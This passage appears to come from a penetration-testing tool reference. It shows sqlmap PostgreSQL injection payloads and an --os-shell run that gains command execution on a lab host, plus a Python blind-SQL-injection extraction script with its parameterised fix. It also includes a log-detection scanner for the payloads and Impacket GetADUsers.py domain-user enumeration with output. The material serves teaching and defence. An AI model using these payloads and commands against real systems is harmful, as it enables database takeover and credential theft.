    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
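The first injection point above is boolean-based blind: sqlmap only learns one bit per request (did the page change or not) and rebuilds data from those answers, which is why it needs many requests and a "statistical model" for the time-based variant. The Python below is an added example, not sqlmap's code, that shows the mechanism end to end: a vulnerable search handler in the style of dashboard.php?search=, the character-by-character bisection that the boolean-based technique automates, and the parameterised fix. SQLite stands in for the PostgreSQL back end of the run above; the table, rows and secret are constructed.

```python
"""Boolean-based blind SQL injection, worked end to end. Added example, not
sqlmap's own code. SQLite in memory stands in for the PostgreSQL target; the
schema, rows and the 'admin' password are constructed."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE cars (name TEXT);
    INSERT INTO cars VALUES ('Elixir'), ('Sandy');
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'S3cr3t!');
""")
REQUESTS = 0  # counts the "HTTP requests" a blind extraction costs


def search_vulnerable(term):
    """Mimics dashboard.php?search=<term>: input concatenated into the query.
    Returns True when the page would render at least one row. That single
    bit per request is all a boolean-based blind attack needs."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT name FROM cars WHERE name = '{term}'"
    return db.execute(sql).fetchone() is not None


def search_fixed(term):
    """Same query with a bound parameter: the input can never become SQL."""
    row = db.execute("SELECT name FROM cars WHERE name = ?", (term,)).fetchone()
    return row is not None


def oracle(condition):
    """Close the string literal, OR in our condition, comment out the rest,
    mirroring sqlmap's prefix/suffix handling (x' ... -- )."""
    return search_vulnerable(f"x' OR ({condition})-- ")


def bisect_int(expr, lo=0, hi=255):
    """Recover the integer value of a SQL expression from yes/no answers:
    exactly 8 requests for the 0..255 range, however the value falls."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(subquery):
    """Pull a string out of the database one character at a time; returns the
    value and the number of requests it took."""
    global REQUESTS
    REQUESTS = 0
    length = bisect_int(f"length({subquery})")
    chars = [chr(bisect_int(f"unicode(substr({subquery}, {i}, 1))"))
             for i in range(1, length + 1)]
    return "".join(chars), REQUESTS


if __name__ == "__main__":
    secret, n = extract("(SELECT password FROM users WHERE username = 'admin')")
    print(f"admin password {secret!r} recovered in {n} requests")
    print("fixed handler, same payload:", search_fixed("x' OR (1=1)-- "))
```

Swap length()/unicode()/substr() for the PostgreSQL equivalents (length, ascii, substring) and this is the shape of what sqlmap sends for each character; the request count is why sqlmap prefers error-based or UNION injection whenever one of those is available on the same parameter.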

sqlmap -u http://x.x.x.x/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell

This repeats the same crawl so that sqlmap reaches the injection point it already stored in its session file, then uses it to open an interactive OS shell (--os-shell). On PostgreSQL this depends on the stacked-queries injection point found above: sqlmap's usual route is UDF injection, writing a shared library to the server through the database and registering sys_exec/sys_eval user-defined functions, so commands run as the OS account of the database service (typically postgres), not as the web server user. The UDFs and helper tables stay on the target afterwards; run sqlmap against the same target with --cleanup once finished.

└─$ sqlmap -u http://10.129.95.174/dashboard.php --forms --crawl=2 --cookie="PHPSESSID=ecl57pepe51nq8t020n19eajdc" --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 22:04:24 /2022-03-27/
 
do you want to check for the existence of site's sitemap(.xml) [y/N]
[22:04:26] [INFO] starting crawler for target URL 'http://10.129.95.174/dashboard.php'
[22:04:26] [INFO] searching for links with depth 1
[22:04:27] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)] 2
[22:04:29] [INFO] starting 2 threads
do you want to normalize crawling results [Y/n]
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N]
[22:04:35] [INFO] found a total of 2 targets
[1/2] Form:
POST http://10.129.95.174
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
POST data: username=&password=
do you want to test this form? [Y/n/q]
> n
[2/2] Form:
GET http://10.129.95.174/dashboard.php?search=
Cookie: PHPSESSID=ecl57pepe51nq8t020n19eajdc
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: search=]:
do you want to fill blank fields with random values? [Y/n]
[22:05:11] [INFO] resuming back-end DBMS 'postgresql'
[22:05:11] [INFO] using '/home/kali/.local/share/sqlmap/output/results-03272022_1005pm.csv' as the CSV results file in multiple targets mode
[22:05:11] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[22:05:11] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn
 
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu
 
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=UIxO';SELECT PG_SLEEP(5)--
 
    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu
---
do you want to exploit this SQL injection? [Y/n]
[22:05:21] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[22:05:21] [INFO] fingerprinting the back-end DBMS operating system
[22:05:22] [INFO] the back-end DBMS operating system is Linux
[22:05:22] [INFO] testing if current user is DBA
[22:05:22] [INFO] retrieved: '1'
[22:05:22] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[22:05:22] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
[22:05:33] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell>
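The session above ends with sqlmap switching to `COPY ... FROM PROGRAM` because the application's database account is a DBA; every stage of that progression also lands in PostgreSQL's statement log. The following is an added example, not code from the page or from sqlmap: it scans constructed `log_statement = 'all'` lines for the indicators visible in the payloads above (PG_SLEEP probes, CHR() concatenation chains, CASE WHEN tautologies and COPY ... FROM PROGRAM), decodes the CHR() chains into the marker strings they build, and lists the database roles that executed a server-side program so their superuser or pg_execute_server_program membership can be reviewed. The log layout, the role `appuser`, the database `webapp` and the table `cmd_exec` are assumptions; the injected SQL is the payload sqlmap reported above.

```python
"""Flag sqlmap-style PostgreSQL injection activity in statement logs.

Added example; the log lines are constructed, not captured from the page's target.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed PostgreSQL log lines in log_statement = 'all' form. The role 'appuser',
# the database 'webapp' and the table 'cmd_exec' are assumptions; the injected SQL
# in lines 2-5 is the payload sqlmap reported in the session above.
SAMPLE_LOG = """\
2022-03-27 22:05:10 UTC [4021] appuser@webapp LOG:  statement: SELECT id, title FROM posts WHERE title ILIKE '%vacation%'
2022-03-27 22:05:11 UTC [4021] appuser@webapp LOG:  statement: SELECT id, title FROM posts WHERE title ILIKE '%UIxO' AND (SELECT (CASE WHEN (9562=9562) THEN NULL ELSE CAST((CHR(66)||CHR(105)||CHR(81)||CHR(98)) AS NUMERIC) END)) IS NULL-- ERQn%'
2022-03-27 22:05:12 UTC [4021] appuser@webapp LOG:  statement: SELECT id, title FROM posts WHERE title ILIKE '%UIxO' AND 6624=CAST((CHR(113)||CHR(112)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (6624=6624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(122)||CHR(118)||CHR(113)) AS NUMERIC)-- McGu%'
2022-03-27 22:05:13 UTC [4021] appuser@webapp LOG:  statement: SELECT id, title FROM posts WHERE title ILIKE '%UIxO' AND 3799=(SELECT 3799 FROM PG_SLEEP(5))-- oRIu%'
2022-03-27 22:05:22 UTC [4021] appuser@webapp LOG:  statement: COPY cmd_exec FROM PROGRAM 'whoami'
"""

# Indicators, each taken from the payload shapes in the sqlmap output above.
RULES: list[tuple[str, re.Pattern[str]]] = [
    # Server-side program execution: needs superuser or pg_execute_server_program.
    ("copy_from_program", re.compile(r"\bCOPY\b.*?\bFROM\s+PROGRAM\b", re.I | re.S)),
    # Time-based blind probing.
    ("time_based_probe", re.compile(r"\bPG_SLEEP\s*\(", re.I)),
    # String literals assembled from CHR() calls to avoid quote characters.
    ("chr_concat_chain", re.compile(r"(?:CHR\s*\(\s*\d+\s*\)\s*\|\|\s*){2,}CHR\s*\(\s*\d+\s*\)", re.I)),
    # CASE WHEN (n=n) with identical operands: boolean/error-based oracle.
    ("boolean_tautology", re.compile(r"CASE\s+WHEN\s*\(\s*(\d+)\s*=\s*\1\s*\)", re.I)),
]

CHR_CALL = re.compile(r"CHR\s*\(\s*(\d+)\s*\)", re.I)
LOG_LINE = re.compile(
    r"^\S+ \S+ \S+ \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<sql>.*)$"
)


@dataclass
class Finding:
    line_no: int
    rule: str
    db_user: str
    detail: str


def decode_chr_chain(chain: str) -> str:
    """Turn CHR(113)||CHR(112)||... into the literal it builds."""
    return "".join(chr(int(code)) for code in CHR_CALL.findall(chain))


def scan_log(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) match; lines that are not statements are skipped."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        for rule, pattern in RULES:
            hit = pattern.search(sql)
            if not hit:
                continue
            if rule == "chr_concat_chain":
                decoded = [repr(decode_chr_chain(c.group(0))) for c in pattern.finditer(sql)]
                detail = "CHR() chains decode to " + ", ".join(decoded)
            else:
                detail = hit.group(0)
            findings.append(Finding(line_no, rule, m.group("user"), detail))
    return findings


def roles_to_review(findings: list[Finding]) -> set[str]:
    """Roles that ran COPY ... FROM PROGRAM. An application role should hold neither
    superuser nor pg_execute_server_program; if it does, that is the finding to fix."""
    return {f.db_user for f in findings if f.rule == "copy_from_program"}


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no:>2} {f.rule:<18} {f.db_user:<8} {f.detail}")
    print("roles to review:", sorted(roles_to_review(results)))
```

The decoded CHR() chains (`qpxvq`, `qbzvq`) are the delimiters sqlmap wraps around extracted data in the error-based payload, which is why they repeat across requests and make a useful correlation key in the log.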

Blog Posts

GetADUsers.py

Description

Part of the Impacket tool suite; enumerates all Active Directory users, provided you have valid domain credentials.

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
usage: GetADUsers.py [-h] [-user username] [-all] [-ts] [-debug]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address]
                     target
 
Queries target domain for users data
 
positional arguments:
  target                domain/username[:password]
 
optional arguments:
  -h, --help            show this help message and exit
  -user username        Requests data for specific user
  -all                  Return all users, including those with no email
                        addresses and disabled accounts. When used with -user
                        it will return user's info even if the account is
                        disabled
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON
 
authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters.
                        If valid credentials cannot be found, it will use the
                        ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256
                        bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use
                        the domain part (FQDN) specified in the target
                        parameter

Examples

 GetADUsers.py hiboxy.com/bgreen:Password1 -dc-ip x.x.x.x -all | tee /tmp/adusers.txt

This command enumerates all users in the hiboxy.com domain using bgreen's credentials; -all includes disabled accounts and accounts without an email address, and tee saves a copy of the output to /tmp/adusers.txt.

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
 
[*] Querying 10.130.10.4 for information about domain.
Name                 Email                          PasswordLastSet     LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator                                       2022-03-14 14:24:35.183246 2022-03-14 14:24:39.485072
Guest                                               <never>             <never>
SROCAdmin                                           2022-03-14 14:24:43.164622 <never>
krbtgt                                              2022-03-14 14:31:12.537996 <never>
SVC_SQLService       SVC_SQLService@hiboxy.com      2022-03-14 14:32:16.637564 <never>
SVC_SQLService2                                     2022-03-14 14:32:16.778834 <never>
krosterman                                          2022-03-14 14:32:16.841622 <never>
smorgan              smorgan@hiboxy.com             2022-03-14 14:32:16.904391 <never>
tduncan              tduncan@hiboxy.com             2022-03-14 14:32:16.951489 2022-03-14 14:36:23.957238
antivirus                                           2022-03-14 14:32:17.861892 <never>
aallen                                              2022-03-14 14:32:17.940372 <never>
aalvarado                                           2022-03-14 14:32:18.018868 <never>
abaird                                              2022-03-14 14:32:18.097351 <never>
...
wortega                                             2022-03-14 14:32:58.110061 <never>
wrobinson                                           2022-03-14 14:32:58.188474 <never>
wstanley                                            2022-03-14 14:32:58.251129 <never>
wwade                                               2022-03-14 14:32:58.329487 <never>
wwilson                                             2022-03-14 14:32:58.392172 <never>
zclayton                                            2022-03-14 14:32:58.470533 <never>
$VJ1000-O3GM981V807M                                <never>             <never>
SM_aaa538fcd9a742de9 SystemMailbox{1f05a927-b919-458d-bebd-92c52421d9be}@hiboxy.com <never>             <never>
SM_92d45bee00ee49769 SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@hiboxy.com <never>             <never>
SM_1f4403d8339543fcb SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@hiboxy.com <never>             <never>
SM_54e3d4f14fe84c84a DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@hiboxy.com <never>             <never>
SM_035c725ae06c4cf38 Migration.8f3e7716-2011-43e4-96b1-aba62d229136@hiboxy.com <never>             <never>
SM_fbadcdb332e74005a FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@hiboxy.com <never>             <never>
SM_f804d6dd51144fc5a SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@hiboxy.com <never>             <never>
SM_ea5a510e6bfd4c758 SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@hiboxy.com <never>             <never>
SM_76b5d049aad445e4a SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@hiboxy.com <never>             <never>
HealthMailboxf81d76d HealthMailboxf81d76db0dbd441ba35044828baa42e7@hiboxy.com 2022-03-14 15:16:49.293057 2022-03-15 23:54:55.305462
HealthMailboxd31f130 HealthMailboxd31f130f2c6748c0a6f57fcfb3beec46@hiboxy.com 2022-03-14 15:16:54.265986 2022-03-15 21:43:19.596318
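The table is more useful once it is parsed, because the Email column is blank for most accounts and a naive split by whitespace shifts the fields. The following added example, not code from the page or from Impacket, parses the GetADUsers.py output above by reading the two timestamp columns from the right, then reports accounts that have a password set but have never logged on (dormant or unconfirmed service accounts) and accounts whose password is older than a chosen age at a reference date. The sample rows are copied from the output above; the review date and the 90-day threshold are assumptions.

```python
"""Parse GetADUsers.py output and flag accounts worth a closer look.

Added example; the sample rows are copied from the output above, the thresholds are assumed.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# A subset of the rows from the GetADUsers.py run above; '...' marks the rows omitted there.
SAMPLE_OUTPUT = """\
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-03-14 14:24:35.183246 2022-03-14 14:24:39.485072
Guest <never> <never>
krbtgt 2022-03-14 14:31:12.537996 <never>
SVC_SQLService SVC_SQLService@hiboxy.com 2022-03-14 14:32:16.637564 <never>
tduncan tduncan@hiboxy.com 2022-03-14 14:32:16.951489 2022-03-14 14:36:23.957238
...
wwilson 2022-03-14 14:32:58.392172 <never>
SM_aaa538fcd9a742de9 SystemMailbox{1f05a927-b919-458d-bebd-92c52421d9be}@hiboxy.com <never> <never>
HealthMailboxf81d76d HealthMailboxf81d76db0dbd441ba35044828baa42e7@hiboxy.com 2022-03-14 15:16:49.293057 2022-03-15 23:54:55.305462
"""

TIMESTAMP_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
REVIEW_DATE = datetime(2022, 7, 1)  # assumed reference date for the report


@dataclass
class ADUser:
    name: str
    email: str | None
    password_last_set: datetime | None
    last_logon: datetime | None


def _pop_timestamp(tokens: list[str]) -> datetime | None:
    """Remove a trailing '<never>' (one token) or 'YYYY-MM-DD HH:MM:SS.ffffff' (two tokens)."""
    if tokens[-1] == "<never>":
        tokens.pop()
        return None
    time_part = tokens.pop()
    date_part = tokens.pop()
    return datetime.strptime(f"{date_part} {time_part}", TIMESTAMP_FORMAT)


def parse_getadusers(text: str) -> list[ADUser]:
    """Parse the table. Timestamps are taken from the right so that a blank Email
    cell, which disappears once whitespace is normalised, does not shift the fields."""
    users: list[ADUser] = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] in ("Name", "...") or tokens[0].startswith("---"):
            continue  # header, separator, ellipsis or blank line
        last_logon = _pop_timestamp(tokens)
        password_last_set = _pop_timestamp(tokens)
        name = tokens.pop(0)
        email = tokens[0] if tokens else None
        users.append(ADUser(name, email, password_last_set, last_logon))
    return users


def never_logged_on(users: list[ADUser]) -> list[str]:
    """Accounts with a password set that have never authenticated: candidates for
    disabling, or service accounts whose use should be confirmed with the owner."""
    return [u.name for u in users if u.password_last_set is not None and u.last_logon is None]


def stale_passwords(users: list[ADUser], as_of: datetime, max_age_days: int = 90) -> list[str]:
    """Accounts whose password is older than max_age_days at the reference date."""
    limit = timedelta(days=max_age_days)
    return [
        u.name
        for u in users
        if u.password_last_set is not None and as_of - u.password_last_set > limit
    ]


if __name__ == "__main__":
    users = parse_getadusers(SAMPLE_OUTPUT)
    print("never logged on:", never_logged_on(users))
    print(f"password older than 90 days at {REVIEW_DATE:%Y-%m-%d}:", stale_passwords(users, REVIEW_DATE))
```

Because `split()` collapses runs of whitespace, the parser accepts both the column-aligned form GetADUsers.py prints and the collapsed form shown on this page.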

Blog Posts